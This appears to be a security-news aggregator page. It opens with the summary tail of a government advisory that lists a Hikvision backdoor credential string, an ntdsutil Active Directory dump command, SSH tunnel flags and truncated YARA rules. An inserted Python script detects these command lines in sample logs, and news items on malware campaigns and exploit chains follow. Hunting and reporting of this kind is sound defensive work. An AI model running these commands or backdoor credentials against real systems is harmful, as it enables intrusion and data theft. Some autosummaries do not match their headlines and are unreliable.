    IP cameras: From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1:
    Table 1: Geographic distribution of targeted IP cameras
      Country    Percentage of Total Attempts
      Ukraine    81.0%
      Romania     9.9%
      Poland      4.0%
      Hungary     2.8%
      Slovakia    1.7%
      Others      0.6%
    Hikvision backdoor string: “YWRtaW46MTEK”
    Digest authentication request pattern (fragment; realm, nonce and response are given as regular expressions):
      CSeq: 2
      Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"
      User-Agent:

    Legitimate utilities: Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise:
      • ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory
      • wevtutil – A legitimate Windows executable used by threat actors to delete event logs
      • vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive
      • ADexplorer – A legitimate Windows executable to view, edit, and backup Active Directory Certificate Services
      • OpenSSH – The Windows version of a legitimate open source SSH client
      • schtasks – A legitimate Windows executable used to create persistence using scheduled tasks
      • whoami – A legitimate Windows executable used to retrieve the name of the current user
      • tasklist – A legitimate Windows executable used to retrieve the list of running processes
      • hostname – A legitimate Windows executable used to retrieve the device name
      • arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment
      • systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information
      • net – A legitimate Windows executable used to retrieve detailed user information
      • wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives
      • cacls – A legitimate Windows executable used to modify permissions on files
      • icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership
      • ssh – A legitimate Windows executable used to establish network shell connections
      • reg – A legitimate Windows executable used to add to or modify the system registry
    Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly.

    Suspicious command lines: While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise:
      • edge.exe “-headless-new -disable-gpu”
      • ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit
      • ssh -Nf
      • schtasks /create /xml

    Detection rules (YARA; both fragments are cut off in this excerpt):
      …IPAddressToString"
      $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"
      $command_8 = ".AllKeys"
      $variable_1 = "$NTLMAuthentication" nocase
      $variable_2 = "$NTLMType2" nocase
      $variable_3 = "$listener" nocase
      $variable_4 = "$hostip" nocase
      $variable_5 = "$request" nocase
      $variable_6 = "$ntlmt2" nocase
      $variable_7 = "$NTLMType2Response" nocase
      $variable_8 = "$buffer" nocase
      condition: 5 of ($command_*) or all of ($variable_*) }
      HEADLACE shortcut
      rule APT28_HEADLACE_SHORTCUT { meta: description = "Detects the HEADLACE backdoor shortcut dropper.

    Indicators of compromise:
      • Outlook CVE Exploitation IOCs (e-mail addresses and IP addresses listed in the advisory)
      • Commonly Used Webmail Providers: portugalmail[.]pt, mail-online[.]dk, email[.]cz, seznam[.]cz
      • Malicious Archive Filenames Involving CVE-2023-38831: calc.war.zip, news_week_6.zip, Roadmap.zip, SEDE-PV-2023-10-09-1_EN.zip, war.zip, Zeyilname.zip
      • Brute Forcing IP Addresses. Disclaimer: These IP addresses date June 2024 through August 2024.

    Mitigation Actions (General Security Mitigations, Architecture and Configuration): Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions.
    "
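An added hunting example (not code from the advisory or its authoring agencies) that turns the suspicious command lines and discovery utilities listed above into detection logic run over constructed process-creation log lines; the log format, the 4-tools-in-10-minutes threshold, the admin baseline, and all host, user and address values are assumptions.

```python
"""Hunting heuristics for the living-off-the-land activity the advisory lists.

Tier 1: command-line patterns from the advisory's "Suspicious command lines"
        fire on a single process-creation event.
Tier 2: discovery utilities from the legitimate-utilities list only fire when
        one host/user pair runs several distinct ones inside a short window,
        and never for pairs on an admin baseline. That is the kind of extra
        heuristic the advisory says is needed to keep false positives down.
Log format, thresholds, host and user names are assumptions for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

HIGH_CONFIDENCE = [
    ("ntdsutil_ifm_dump", re.compile(
        r'ntdsutil(\.exe)?\s+"activate instance ntds"\s+ifm\s+"create full [^"]*"\s+quit\s+quit', re.I)),
    ("edge_headless", re.compile(r"edge\.exe.*-headless.*-disable-gpu", re.I)),
    ("ssh_background_tunnel", re.compile(r"(^|\\|\s)ssh(\.exe)?\s+-Nf\b", re.I)),
    ("schtasks_xml_create", re.compile(r"schtasks(\.exe)?\s+/create\s+/xml\b", re.I)),
]

RECON_BINARIES = {"whoami", "tasklist", "hostname", "arp", "systeminfo", "net", "wmic"}
RECON_WINDOW = timedelta(minutes=10)   # assumed window
RECON_THRESHOLD = 4                    # distinct recon binaries per host/user


def parse_event(line):
    """Parse 'ISO-timestamp|host|user|command line' (a constructed format)."""
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd}


def image_name(cmd):
    """Executable name from the first token: path, quotes and .exe stripped."""
    token = cmd.strip().split()[0].strip('"')
    return re.sub(r"\.exe$", "", token.rsplit("\\", 1)[-1].lower())


def hunt(lines, baseline=frozenset()):
    """Return alerts as (rule, host, user, detail) tuples in time order.

    `baseline` holds (host, user) pairs whose routine recon use is accepted;
    tier-1 patterns still fire for them.
    """
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    alerts = []
    recent = defaultdict(list)  # (host, user) -> [(timestamp, binary), ...]
    for ev in events:
        for rule, pattern in HIGH_CONFIDENCE:
            if pattern.search(ev["cmd"]):
                alerts.append((rule, ev["host"], ev["user"], ev["cmd"]))
        key = (ev["host"], ev["user"])
        binary = image_name(ev["cmd"])
        if binary in RECON_BINARIES and key not in baseline:
            # Keep only events inside the sliding window, then count distinct tools.
            window = [(t, b) for t, b in recent[key] if ev["ts"] - t <= RECON_WINDOW]
            window.append((ev["ts"], binary))
            recent[key] = window
            distinct = sorted({b for _, b in window})
            if len(distinct) == RECON_THRESHOLD:  # fire once, when the threshold is reached
                alerts.append(("recon_burst", ev["host"], ev["user"], ",".join(distinct)))
    return alerts


# Constructed process-creation log lines; hosts, users and addresses are made up.
SAMPLE_LOG = [
    r"2024-07-02T09:00:00|dc01|CORP\svc_ops|whoami",
    r"2024-07-02T09:00:10|dc01|CORP\svc_ops|hostname",
    r"2024-07-02T09:00:20|dc01|CORP\svc_ops|arp -a",
    r"2024-07-02T09:00:40|dc01|CORP\svc_ops|systeminfo",
    r'2024-07-02T09:03:00|dc01|CORP\svc_ops|C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\xyz" quit quit',
    r"2024-07-02T09:05:00|ws17|CORP\jdoe|C:\Windows\System32\OpenSSH\ssh.exe -Nf user@203.0.113.5",
    r'2024-07-02T09:06:00|ws17|CORP\jdoe|"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://example.invalid',
    r"2024-07-02T10:30:00|ws03|CORP\helpdesk|whoami",
    r"2024-07-02T10:30:05|ws03|CORP\helpdesk|tasklist",
    r"2024-07-02T10:30:10|ws03|CORP\helpdesk|net user",
    r"2024-07-02T10:30:15|ws03|CORP\helpdesk|systeminfo",
    r"2024-07-02T11:00:00|ws03|CORP\helpdesk|schtasks /create /xml C:\temp\task.xml /tn Updater",
]
ADMIN_BASELINE = frozenset({("ws03", r"CORP\helpdesk")})  # pair known to run recon tools routinely

if __name__ == "__main__":
    for rule, host, user, detail in hunt(SAMPLE_LOG, baseline=ADMIN_BASELINE):
        print(f"{rule:22} {host:5} {user:14} {detail}")
```

With the baseline applied, the helpdesk host's routine discovery commands are suppressed while its schtasks /create /xml event still fires; without the baseline the same host also produces a recon_burst alert.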


    iClicker site hack targeted students with malware via fake CAPTCHA

    exploits
    2025-05-11 https://www.bleepingcomputer.com/news/security/iclicker-hack-targeted-students-with-malware-via-fake-captcha/
    The website of iClicker, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices. [...] "

    Autosummary: This type of malware can also steal cryptocurrency wallets, private keys, and text files likely to contain sensitive information, such as those named seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf. From past campaigns, the attack likely distributed an infostealer, which can steal cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 45

    exploits
    2025-05-11 https://securityaffairs.com/177697/breaking-news/security-affairs-malware-newsletter-round-45.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape iClicker site hack targeted students with malware via fake CAPTCHA New Noodlophile Stealer Distributes Via Fake AI Video Generation Platforms Backdoor found in popular ecommerce components   Stealthy Linux backdoor leveraging residential proxies and NHAS reverse SSH   […] "

    Autosummary: "


    Fake AI video generators drop new Noodlophile infostealer malware

    exploits
    2025-05-10 https://www.bleepingcomputer.com/news/security/fake-ai-video-generators-drop-new-noodlophile-infostealer-malware/
    Fake AI-powered video generation tools are being used to distribute a new information-stealing malware family called "Noodlophile," under the guise of generated media content. [...] "

    Autosummary: According to Morphisec, Noodlophile is being sold on dark web forums, often bundled with "Get Cookie + Pass" services, so it’s a new malware-as-a-service operation linked to Vietnamese-speaking operators. "


    Operation Moonlander dismantled the botnet behind Anyproxy and 5socks cybercriminals services

    ciber
    2025-05-10 https://securityaffairs.com/177664/malware/operation-moonlander-dismantled-the-botnet-behind-anyproxy-and-5socks-cybercriminals-services.html
    Law enforcement dismantled a 20-year botnet behind Anyproxy and 5socks cybercriminals services and arrested four suspects. Authorities dismantled a 20-year-old botnet tied to Anyproxy and 5socks as part of an international operation codenamed “Operation Moonlander”; four men, including three Russians, were indicted for running the illegal proxy networks. The U.S. Justice Department charged Russian nationals, […] "

    Autosummary: The U.S. Justice Department charged Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, with Conspiracy and Damage to Protected Computers for conspiring with others to maintain, operate, and profit from Anyproxy and 5socks services. The system checks deny-lists to avoid detection, but open access allows customers to carry out a broad range of malicious activities like ad fraud, DDoS, brute force attacks, and data exploitation. "


    Ascension reveals personal data of 437,329 patients exposed in cyberattack

    ciber
    2025-05-10 https://securityaffairs.com/177676/data-breach/ascension-reveals-personal-data-of-437329-patients-exposed-in-cyberattack.html
    A data breach at Ascension, caused by a former partner’s compromise, exposed the health information of over 430,000 patients. Ascension is one of the largest private healthcare systems in the United States, ranking second in the United States by the number of hospitals as of 2019. At the end of April, the company notified patients that their personal and health information […] "

    Autosummary: Pierluigi Paganini, May 10, 2025. A data breach at Ascension, caused by a former partner’s compromise, exposed the health information of over 430,000 patients. "


    "God loves Peru": Country celebrates new Pope as one of their own

    latam government
    2025-05-09 https://www.bbc.com/news/articles/cewdl4e57v7o
    Robert Prevost is a citizen of the country, reportedly referring to it as "mi segunda patria" – my second homeland. "

    Autosummary: (Image, Reuters: A woman holds an image of Cardinal Robert Francis Prevost in front of the Cathedral of Saint Mary in Chiclayo, Peru, after he was elected the new Pope, 8 May 2025.) Janinna Sesa, who met Prevost while she worked for the church’s Caritas nonprofit, told the Associated Press during torrential rains in 2022 he waded through mud to help people in Chiclayo and nearby villages. He arrived at the Augustinian mission in Chulucanas, in the Peruvian department of Piura, in 1985, aged 30, and the following year, joined the mission in Trujillo. "


    Coro SAT module defends against phishing attacks

    financial
    2025-05-09 https://www.helpnetsecurity.com/2025/05/09/coro-sat-module/

    Coro unveiled its Security Awareness Training (SAT) module. A purpose-built solution, SAT helps SMBs reduce human error, defend against phishing attacks, and demonstrate compliance without adding new tools to manage. As part of Coro’s modular cybersecurity platform, the new Security Awareness Training module delivers maximum protection with minimal complexity. “Over 90% of breaches start with human error,” said Coro’s CEO, Guy Moskowitz. “AI has made phishing attacks more convincing than ever, which is why our … More

    The post Coro SAT module defends against phishing attacks appeared first on Help Net Security.

    "

    Autosummary: This approach reduces tool sprawl, friction, and manual overhead while delivering adaptive, automated training within the same platform SMBs use to protect endpoints, data, and users. "


    Google Rolls Out On-Device AI Protections to Detect Scams in Chrome and Android

    financial
    2025-05-09 https://thehackernews.com/2025/05/google-rolls-out-on-device-ai.html
    Google on Thursday announced it's rolling out new artificial intelligence (AI)-powered countermeasures to combat scams across Chrome, Search, and Android. The tech giant said it will begin using Gemini Nano, its on-device large language model (LLM), to improve Safe Browsing in Chrome 137 on desktops. "The on-device approach provides instant insight on risky websites and allows us to offer "

    Autosummary: The updates also arrive as Google appears to be readying an Advanced Protection feature in Android 16 that, in some ways, mirrors Apple's approach by turning off JavaScript, disabling 2G connections, and activating a number of security features by default, such as Theft Detection Lock, Offline Device Lock, Android Safe Browsing, and spam protection in Messages. "


    Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell

    exploits
    2025-05-09 https://thehackernews.com/2025/05/chinese-hackers-exploit-sap-rce-flaw.html
    A China-linked unnamed threat actor dubbed Chaya_004 has been observed exploiting a recently disclosed security flaw in SAP NetWeaver. Forescout Vedere Labs, in a report published Thursday, said it uncovered a malicious infrastructure likely associated with the hacking group weaponizing CVE-2025-31324 (CVSS score: 10.0) since April 29, 2025. CVE-2025-31324 refers to a critical SAP NetWeaver flaw "

    Autosummary: According to Onapsis, hundreds of SAP systems globally have fallen victim to attacks spanning industries and geographies, including energy and utilities, manufacturing, media and entertainment, oil and gas, pharmaceuticals, retail, and government organizations. "


    LockBit hacked: What does the leaked data show?

    ransomware
    2025-05-09 https://www.helpnetsecurity.com/2025/05/09/lockbit-hacked-data-leaked/

    The affiliate panel of the infamous LockBit Ransomware-as-a-Service (RaaS) group has been hacked and defaced, showing a link to a MySQL database dump ostensibly containing leaked data relating to the group’s operations. [Image: The defaced dark web affiliate panel (Source: Help Net Security)] The breach has been confirmed by LockBitSupp – the creator, developer and administrator of the LockBit ransomware group – who downplayed the attack by saying that decryptors, stolen company data, and the ransomware … More

    The post LockBit hacked: What does the leaked data show? appeared first on Help Net Security.

    "

    Autosummary: The dump of the backend MySQL database was apparently generated on April 29, 2025, and contains: nearly 60,000 unique bitcoin addresses/wallets; custom versions of the ransomware created for specific attacks and the associated public keys; nearly 4,500 negotiation messages exchanged by the ransomware operators and victims; and a list of 76 affiliates (i.e., users of the affiliate panel). "


    Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials

    latam
    2025-05-09 https://thehackernews.com/2025/05/initial-access-brokers-target-brazil.html
    Cybersecurity researchers are warning of a new campaign that's targeting Portuguese-speaking users in Brazil with trial versions of commercial remote monitoring and management (RMM) software since January 2025. "The spam message uses the Brazilian electronic invoice system, NF-e, as a lure to entice users into clicking hyperlinks and accessing malicious content hosted in Dropbox," Cisco Talos "

    Autosummary: "


    Beyond Vulnerability Management – Can You CVE What I CVE?

    exploits
    2025-05-09 https://thehackernews.com/2025/05/beyond-vulnerability-management-cves.html
    The Vulnerability Treadmill: The reactive nature of vulnerability management, combined with delays from policy and process, strains security teams. Capacity is limited and patching everything immediately is a struggle. Our Vulnerability Operation Center (VOC) dataset analysis identified 1,337,797 unique findings (security issues) across 68,500 unique customer assets. 32,585 of them were distinct "

    Autosummary: Another attacker, A2, with a 10% success rate (1 in 10), would need about 88 targets to ensure at least one success, while a more skilled attacker, A3, with a 20% success rate (1 in 5), would only need around 42 targets for the same probability. The current approach to vulnerability management is rooted in its name: focusing on "vulnerabilities" (as defined by CVE, CVSS, EPSS, misconfiguration, errors, etc) and their "management." In 2023, Google's Threat Analysis Group (TAG) and Mandiant identified 97 zero-day exploits, primarily affecting mobile devices, operating systems, browsers, and other applications. By September 2024, the CVE program, active for 25 years, had published over 264,000 CVEs, and by 15 April 2025, the number of total CVEs increased to approximately 290,000 CVEs including "Rejected" or "Deferred". To demonstrate the tradeoff between coverage and efficiency, we need two datasets: one representing potential patches (VOC dataset) and another representing actively exploited vulnerabilities, which includes CISA KEV [10], ethical hacking findings, and data from our CERT Vulnerability Intelligence Watch service [12]. We can assume each hacker has a certain "probability" of compromising a system, with this probability increasing based on their skill, experience, tools, and time. The disclosure of serious vulnerabilities is complicated by disagreements between researchers and vendors over impact, relevance, and accuracy, affecting the wider community [1, 2]. In-Depth Analysis: Statistics from CyberSOC, vulnerability scanning, pentesting, CERT, Cy-X and ransomware observations from Dark Net surveillance. This response can include patching, reconfiguring, filtering, adding compensating controls, or even removing vulnerable systems. "


    Cybercriminal services target end-of-life routers, FBI warns

    ciber
    2025-05-09 https://securityaffairs.com/177648/cyber-crime/malware-targets-end-of-life-routers.html
    The FBI warns that attackers are using end-of-life routers to deploy malware and turn them into proxies sold on 5Socks and Anyproxy networks. The FBI released a FLASH alert warning about 5Socks and Anyproxy malicious services targeting end-of-life (EOL) routers. Attackers target EoL devices to deploy malware by exploiting vulnerabilities and create botnets for attacks […] "

    Autosummary: Vulnerable models include: E1200, E2500, E1000, E4200, E1500, E300, E3200, WRT320N, E1550, WRT610N, E100, M10, WRT310N. The FBI published indicators of compromise (IoCs) associated with attacks targeting end-of-life routers and mitigations: “The FBI recommends users identify if any of the devices vulnerable to compromise are part of their networking infrastructure. "


    Russia-linked ColdRiver used LostKeys malware in recent attacks

    exploits
    2025-05-09 https://securityaffairs.com/177638/apt/russia-linked-coldriver-used-lostkeys-malware-in-recent-attacks.html
    Since early 2025, Russia-linked ColdRiver has used LostKeys malware to steal files in espionage attacks on Western governments and organizations. Google’s Threat Intelligence Group discovered LOSTKEYS, a new malware used by Russia-linked APT COLDRIVER, in recent attacks to steal files and gather system info. The ColdRiver APT (aka “Seaborgium”, “Callisto”, “Star Blizzard”, “TA446”) is a Russian cyberespionage group […] "

    Autosummary: The ColdRiver APT (aka “Seaborgium”, “Callisto”, “Star Blizzard”, “TA446”) is a Russian cyberespionage group that has been targeting government officials, military personnel, journalists and think tanks since at least 2015. "


    LockBit ransomware gang breached, secrets exposed

    exploits ransomware
    2025-05-09 https://www.tripwire.com/state-of-security/lockbit-ransomware-gang-breached-secrets-exposed
    Oh dear, what a shame, never mind. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: Alongside the link to the leaked database, a message left by the attackers reads: "Don't do crime CRIME IS BAD xoxo from Prague" The downloadable SQL database contains sensitive information about the criminal gang's activities, including negotiations between LockBit and its victims, victim profiles (including their estimated revenue), Bitcoin addresses linked to LockBit, possible decryption keys, custom ransomware builds, and a list of 75 admins and affiliates. "


    Fake AI platforms deliver malware disguised as video content

    exploits
    2025-05-09 https://www.helpnetsecurity.com/2025/05/09/fake-ai-platforms-deliver-malware/

    A clever malware campaign delivering the novel Noodlophile malware is targeting creators and small businesses looking to enhance their productivity with AI tools. But, in an unusual twist, the threat actors are not disguising the malware as legitimate software, but as content / output created by a legitimate-looking AI tool. AI as a social engineering lure: “As AI surges into mainstream adoption, millions of users turn daily to AI-powered tools for content creation,” Morphisec security … More

    The post Fake AI platforms deliver malware disguised as video content appeared first on Help Net Security.

    "

    Autosummary: “Previously undocumented in public malware trackers or reports, this stealer combines browser credential theft, wallet exfiltration, and optional remote access deployment,” Uzan noted. "


    Ascension says recent data breach affects over 430,000 patients

    financial
    2025-05-09 https://www.bleepingcomputer.com/news/security/ascension-says-recent-data-breach-affects-over-430-000-patients/
    Ascension, one of the largest private healthcare systems in the United States, has revealed that the personal and healthcare information of over 430,000 patients was exposed in a data breach disclosed last month. [...] "

    Autosummary: They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs). "


    Google Chrome to use on-device AI to detect tech support scams

    financial
    2025-05-09 https://www.bleepingcomputer.com/news/security/google-chrome-to-use-on-device-ai-to-detect-tech-support-scams/
    Google is implementing a new Chrome security feature that uses the built-in "Gemini Nano" large-language model (LLM) to detect and block tech support scams while browsing the web. [...] "

    Autosummary: Chrome's new anti-scam system, which is integrated into the browser's "Enhanced Protection," analyzes web pages in real time to detect scam signals like fake virus alerts or full-screen lockouts, which are hallmarks of tech support scams. "


    Google Chrome will use AI to block tech support scam websites

    financial
    2025-05-09 https://www.malwarebytes.com/blog/news/2025/05/google-chrome-will-use-ai-to-block-tech-support-scam-websites
    Google announced it will equip Chrome with an AI driven method to detect and block Tech Support Scam websites "

    Autosummary: How it works: When the user lands on a suspicious page, which is decided by the on-device LLM based on specific triggers like the Keyboard Lock API, Chrome provides the LLM with the contents of the page that the user is on and queries it to extract security signals, such as the intent of the page. "


    BREAKING: 7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation

    industry
    2025-05-09 https://thehackernews.com/2025/05/breaking-7000-device-proxy-botnet-using.html
    A joint law enforcement operation undertaken by Dutch and U.S. authorities has dismantled a criminal proxy network that's powered by thousands of infected Internet of Things (IoT) and end-of-life (EoL) devices, enlisting them into a botnet for providing anonymity to malicious actors. In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich "

    Autosummary: In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, have been charged by the U.S. Department of Justice (DoJ) for operating, maintaining, and profiting from the proxy services. To mitigate the risks posed by such proxy botnets, users are advised to regularly reboot routers, install security updates, change default passwords, and upgrade to newer models once they reach EoL status. "


    Mexico sues Google over "Gulf of America" name change

    latam
    2025-05-09 https://www.bbc.com/news/articles/c5yk5nj7p7ko
    President Sheinbaum argues Trump's executive order applies only to the US portion of the continental shelf. "

    Autosummary: Iranian Foreign Minister Abbas Araqchi has responded by saying he hopes the "absurd rumours" are "no more than a disinformation campaign" and such a move would "bring the wrath of all Iranians". "


    LockBit ransomware gang hacked, victim negotiations exposed

    exploits ransomware
    2025-05-08 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-hacked-victim-negotiations-exposed/
    The LockBit ransomware gang has suffered a data breach after its dark web affiliate panels were defaced and replaced with a message linking to a MySQL database dump. [...] "

    Autosummary: In 2024, a law enforcement operation called Operation Cronos took down LockBit's infrastructure, including 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, 1,000 decryption keys, and the affiliate panel. "


    Global cybersecurity readiness remains critically low

    ciber
    2025-05-08 https://www.helpnetsecurity.com/2025/05/08/cybersecurity-readiness-level-across-organizations/

    Only 4% of organizations worldwide have achieved the ‘mature’ level of readiness required to withstand cybersecurity threats, according to Cisco’s 2025 Cybersecurity Readiness Index. This is a slight increase from last year’s index, in which 3% of organizations worldwide were designated as mature. This demonstrates that despite a slight improvement from last year, global cybersecurity preparedness remains low as hyperconnectivity and AI introduce new complexities for security practitioners. AI is changing the threat landscape AI … More

    The post Global cybersecurity readiness remains critically low appeared first on Help Net Security.

    "

    Autosummary: Investment priorities shift: While 96% of organizations plan to upgrade their IT infrastructure, only 45% allocate more than 10% of their IT budget to cybersecurity (down 8% year-over-year), emphasizing a critical need for more focused investment in comprehensive defense strategies, which is incredibly important as threats are not slowing. "


    How agentic AI and non-human identities are transforming cybersecurity

    ciber
    2025-05-08 https://www.helpnetsecurity.com/2025/05/08/non-human-identities-agentic-ai-cybersecurity/

    Within the average enterprise, non-human identities (NHIs) now outnumber employees, contractors, and customers by anything between 10-to-1 and 92-to-1. Add to this the fragmentation of human identity management resulting from authorizing a single person’s access to multiple on-premises, cloud computing and hybrid environments, and enterprise identity and access management (IAM) becomes extremely challenging. Trust no-one: The concept of applying zero-trust policies to reduce the risk of unauthorized access to corporate IT environments has been promoted … More

    The post How agentic AI and non-human identities are transforming cybersecurity appeared first on Help Net Security.

    "

    Autosummary: Managing NHIs and identity sprawl with AI: Identity, governance and administration (IGA) technology augmented with AI can continuously analyze each individual’s and NHI’s access, and dynamically adapt access according to that person’s, or entity’s, behavior. Analyzing an entire enterprise ecosystem to understand who’s using what, when, and where, and then using machine learning and AI to modify and adapt policies and governance, could result in automated, cyclical improvement processes. "


    Wave of tech layoffs leads to more job scams

    financial
    2025-05-08 https://www.helpnetsecurity.com/2025/05/08/job-employment-scams/

    The tech industry is experiencing significant layoffs, leaving thousands of IT and cybersecurity professionals in search of new employment opportunities. Unfortunately, as these individuals search for new opportunities, scammers are actively preying on them. Losing a job, especially when you can’t afford to be without income, is emotionally stressful, and desperation can make you vulnerable to these types of scams. Given the ongoing economic uncertainty, market volatility, and the adoption of AI across industries, more … More

    The post Wave of tech layoffs leads to more job scams appeared first on Help Net Security.

    "

    Autosummary: AI and job scams: With the rise of AI, these scams are about to get more convincing, as emails, job postings, and even video calls with scammers posing as job recruiters will be hard to distinguish. Trust your instincts: If something feels off, such as vague job descriptions, unusually high salaries for minimal work, or pressure to act quickly, it’s best to proceed with caution. "


    Russian Hackers Using ClickFix Fake CAPTCHA to Deploy New LOSTKEYS Malware

    exploits rusia-ucrania
    2025-05-08 https://thehackernews.com/2025/05/russian-hackers-using-clickfix-fake.html
    The Russia-linked threat actor known as COLDRIVER has been observed distributing a new malware called LOSTKEYS as part of an espionage-focused campaign using ClickFix-like social engineering lures. "LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker," the Google Threat "

    Autosummary: "Clicking 'I'm not a robot' triggers a Binance Smart Contract, using an EtherHiding technique, to deliver a Base64-encoded command to the clipboard, which users are prompted to run in Terminal via macOS-specific shortcuts (⌘ + Space, ⌘ + V)," an independent researcher who goes by the alias Badbyte said. "


    Cisco Patches CVE-2025-20188 (10.0 CVSS) in IOS XE That Enables Root Exploits via JWT

    exploits
    2025-05-08 https://thehackernews.com/2025/05/cisco-patches-cve-2025-20188-100-cvss.html
    Cisco has released software fixes to address a maximum-severity security flaw in its IOS XE Wireless Controller that could enable an unauthenticated, remote attacker to upload arbitrary files to a susceptible system. The vulnerability, tracked as CVE-2025-20188, has been rated 10.0 on the CVSS scoring system. "This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an "

    Autosummary: "


    U.S. CISA adds GoVision device flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-05-08 https://securityaffairs.com/177599/security/u-s-cisa-adds-govision-device-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds GoVision device flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualitia Active! Mail, Broadcom Brocade Fabric OS, and Commvault Web Server flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: According to Binding Operational Directive […] "

    Autosummary: Most of the exposed devices are based in the United States (8,720), followed by Germany (1,518), Taiwan (789), and Canada (761). "


    SonicWall urges admins to patch VPN flaw exploited in attacks

    exploits
    2025-05-08 https://www.bleepingcomputer.com/news/security/sonicwall-urges-admins-to-patch-vpn-flaw-exploited-in-attacks/
    SonicWall has urged its customers to patch three security vulnerabilities affecting its Secure Mobile Access (SMA) appliances, one of them tagged as exploited in attacks [...] "

    Autosummary: "


    Yet another SonicWall SMA100 vulnerability exploited in the wild (CVE-2025-32819)

    exploits
    2025-05-08 https://www.helpnetsecurity.com/2025/05/08/sonicwall-sma100-vulnerability-exploited-cve-2025-32819/

    SonicWall has fixed multiple vulnerabilities affecting its SMA100 Series devices, one of which (CVE-2025-32819) appears to be a patch bypass for an arbitrary file delete vulnerability that was exploited in zero-day attacks in early 2021, and may have also been leveraged in the wild. The vulnerabilities and the attack chain: SonicWall SMA100 Series appliances provide a unified secure access (VPN) gateway for small and medium-size businesses, and are regularly targeted by attackers. Reported by Rapid7 … More

    The post Yet another SonicWall SMA100 vulnerability exploited in the wild (CVE-2025-32819) appeared first on Help Net Security.

    "

    Autosummary: In a write-up released on Wednesday, Emmons has demonstrated how the three vulnerabilities could be leveraged in a sequence that ends with the attacker gaining root-level remote code execution on a vulnerable SMA device: CVE-2025-32819 can be exploited remotely to delete the primary SQLite database, which will trigger a system reboot to factory default settings and thus reset the password of the default SMA admin user to “password”; after logging in as admin to the SMA web interface, CVE-2025-32820 can be exploited to make a specific directory writable; CVE-2025-32821 can then be leveraged to write a malicious executable file into the directory, which will be executed by the device. “Based on our testing, the unauthenticated arbitrary file delete vulnerability disclosed by NCC Group "


    MirrorFace Targets Japan and Taiwan with ROAMINGMOUSE and Upgraded ANEL Malware

    exploits
    2025-05-08 https://thehackernews.com/2025/05/mirrorface-targets-japan-and-taiwan.html
    The nation-state threat actor known as MirrorFace has been observed deploying malware dubbed ROAMINGMOUSE as part of a cyber espionage campaign directed against government agencies and public institutions in Japan and Taiwan. The activity, detected by Trend Micro in March 2025, involved the use of spear-phishing lures to deliver an updated version of a backdoor called ANEL. "The ANEL file from "

    Autosummary: "Enterprises and organizations, especially those with high-value assets like sensitive data relating to governance, as well as intellectual property, infrastructure data, and access credentials should continue to be vigilant and implement proactive security measures to prevent falling victim to cyber attacks." "


    Kickidler employee monitoring software abused in ransomware attacks

    exploits ransomware
    2025-05-08 https://www.bleepingcomputer.com/news/security/kickidler-employee-monitoring-software-abused-in-ransomware-attacks/
